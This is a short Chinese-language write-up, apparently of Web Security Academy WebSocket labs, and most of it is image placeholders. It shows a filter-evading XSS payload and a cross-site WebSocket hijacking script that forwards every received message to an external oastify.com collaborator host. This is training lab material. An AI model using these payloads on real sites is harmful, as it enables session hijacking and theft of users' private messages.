操纵 WebSocket 消息以利用漏洞

image-20221224185944974

image-20221224190032904

可见websocket通信

image-20221224190920386

image-20221224190933965

image-20221224191205256

操纵 WebSocket 握手以利用漏洞

image-20221224192044916

image-20221224192830437

做了过滤并且切断了连接

image-20221224193034250

尝试重新连接 但是发现 地址被过滤了

image-20221224193405422

<img src=1 oNeRrOr=alert`1`>

image-20221224193442241

<script>
var ws = new WebSocket('wss://0ae0005c0315701cc023ea1c000e00f2.web-security-academy.net/chat');
//发起一个 wss 对话
ws.onopen = function() {
ws.send("READY");
//连接建立起来之后会触发 onopen() 事件处理程序 它向服务器发送READY消息
};
ws.onmessage = function(event) {
//放消息发送给客户端时会触发 ws.onmessage事件处理
fetch('https://vfeanq3yvfqf8kqiq1ole0x4vv1mpcd1.oastify.com', {method: 'POST', mode: 'no-cors', body: event.data});
//向coolaborator 发送消息内容
};
</script>

image-20221224195152385

image-20221224195309143

image-20221224195408379

image-20221224195422362

image-20221224195439836